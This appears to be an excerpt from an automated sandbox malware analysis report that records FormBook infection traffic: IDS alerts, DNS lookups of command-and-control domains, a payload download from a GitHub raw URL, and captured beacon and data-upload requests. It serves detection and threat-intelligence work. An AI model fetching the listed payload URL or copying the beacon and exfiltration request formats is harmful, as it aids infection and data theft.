        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63495 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63490 -> 156.232.181.155:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63490 -> 156.232.181.155:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63489 -> 156.232.181.155:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63502 -> 161.97.142.144:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63493 -> 101.35.209.183:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63497 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63503 -> 43.155.76.124:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63487 -> 156.232.181.155:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63492 -> 101.35.209.183:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63488 -> 156.232.181.155:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63500 -> 161.97.142.144:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63501 -> 161.97.142.144:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63498 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63498 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63494 -> 101.35.209.183:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63494 -> 101.35.209.183:80
        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 185.199.111.133:443 -> 192.168.2.5:49705
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.030002350.xyz
        Source: global trafficHTTP traffic detected: GET /richie213/ani/refs/heads/main/jdikobc.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /new_img.jpg HTTP/1.1Host: 103.20.102.62Connection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
        Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
        Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
        Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
        Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49732
        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:63373
        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:63381
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: unknownTCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: global trafficHTTP traffic detected: GET /richie213/ani/refs/heads/main/jdikobc.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /new_img.jpg HTTP/1.1Host: 103.20.102.62Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /f3nk/?X8wps=HD9ptle8L&qb6h=v6+LTBEbPC2R85sFOmmbFC2Q/XGqyVy+lLBawY5mHj8QlUcwrm67JADjHek/seltQEUToGC/qYQit/V96/0oCLxc35by5p8gg2oFcQQLjMbf4RKBZtC51re3Q6vWyy22Hg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.bcg.servicesConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /c6yl/?qb6h=QAykvSbKcm9a/Zd756st6oc0c2ndg18QAahNUeLfrY6eiOHcgN8hz9hRbXFDsZyrs9wVKyWLGfVe8RlZjLvC3xYEXrLC/N5rcVQ70kVg4GEX58Hw+NfPJKYlgF2/w0JeMA==&X8wps=HD9ptle8L HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.5tuohbpzyj9.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /grmn/?qb6h=GvVCyhHHBwWm3Wiqs6T1+HSOrEGLSLVs90U44aOn+V5a+alxbue2HRsnEZvT1CUlYqTASXI2DXs3J4l64Md/MUcibXuAbURyjOW4TtuxIV2IutBvJyuUjqtFtGqljQIKAQ==&X8wps=HD9ptle8L HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.yc791022.asiaConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /gdpp/?X8wps=HD9ptle8L&qb6h=XNlLlzJ611biWBDnQnCeFZ6NVZ4xLjWXfr+0L15v/dkoQ7LxqA4db7MsNS0iTnnZ4s3kssINbHg5oGi7TlfLVlZQ57t8NMxb4MyHODvld5yYZYMDALlCTAgJ47pyJF8rKg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.nimil.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /wrcq/?qb6h=0aBKMIuxMWsDZlZuGCNWGAisa+F3tvB0xMbS2kgCUdLh7rFDbnNAXehk8UbfWJO3lEanFmC09f09BQpsWN4gqHRUU5ElviQXwZTk2Xd/dFN8TxdFGzfCv1WAKHEC3ArfOQ==&X8wps=HD9ptle8L HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.030002350.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: www.bcg.services
        Source: global trafficDNS traffic detected: DNS query: www.alihones.lol
        Source: global trafficDNS traffic detected: DNS query: www.5tuohbpzyj9.buzz
        Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
        Source: global trafficDNS traffic detected: DNS query: www.nimil.info
        Source: global trafficDNS traffic detected: DNS query: www.030002350.xyz
        Source: global trafficDNS traffic detected: DNS query: www.nuy25c9t.sbs
        Source: unknownHTTP traffic detected: POST /c6yl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.5tuohbpzyj9.buzzCache-Control: no-cacheConnection: closeContent-Length: 205Content-Type: application/x-www-form-urlencodedOrigin: http://www.5tuohbpzyj9.buzzReferer: http://www.5tuohbpzyj9.buzz/c6yl/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36Data Raw: 71 62 36 68 3d 64 43 61 45 73 6c 54 56 51 6a 5a 38 72 65 70 77 78 4b 59 59 35 4b 30 34 66 58 72 62 6c 6b 30 4f 57 71 35 7a 5a 65 58 4e 73 64 4c 7a 31 2f 32 71 76 4f 77 6e 74 76 34 53 43 53 51 64 78 59 6d 7a 31 65 73 6e 44 67 76 55 64 65 52 7a 79 68 70 41 73 5a 2f 36 74 52 6b 75 66 61 58 6e 78 76 68 71 66 68 41 53 39 58 46 4c 37 78 52 51 30 63 72 6a 6f 64 6a 54 47 5a 30 44 2b 6a 32 31 31 31 38 58 5a 50 50 34 77 52 64 79 36 71 78 58 6f 44 57 37 44 64 42 73 36 4e 34 6b 57 30 48 74 68 48 39 66 55 66 63 34 46 43 6c 52 57 70 61 39 38 31 58 4b 52 73 4f 64 71 62 7a 65 42 56 38 2f 56 76 58 31 55 6b 41 44 33 46 63 3d Data Ascii: qb6h=dCaEslTVQjZ8repwxKYY5K04fXrblk0OWq5zZeXNsdLz1/2qvOwntv4SCSQdxYmz1esnDgvUdeRzyhpAsZ/6tRkufaXnxvhqfhAS9XFL7xRQ0crjodjTGZ0D+j21118XZPP4wRdy6qxXoDW7DdBs6N4kW0HthH9fUfc4FClRWpa981XKRsOdqbzeBV8/VvX1UkAD3Fc=
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 07:16:54 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 07:17:04 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 07:17:06 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 07:17:06 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 07:17:09 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 07:17:16 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
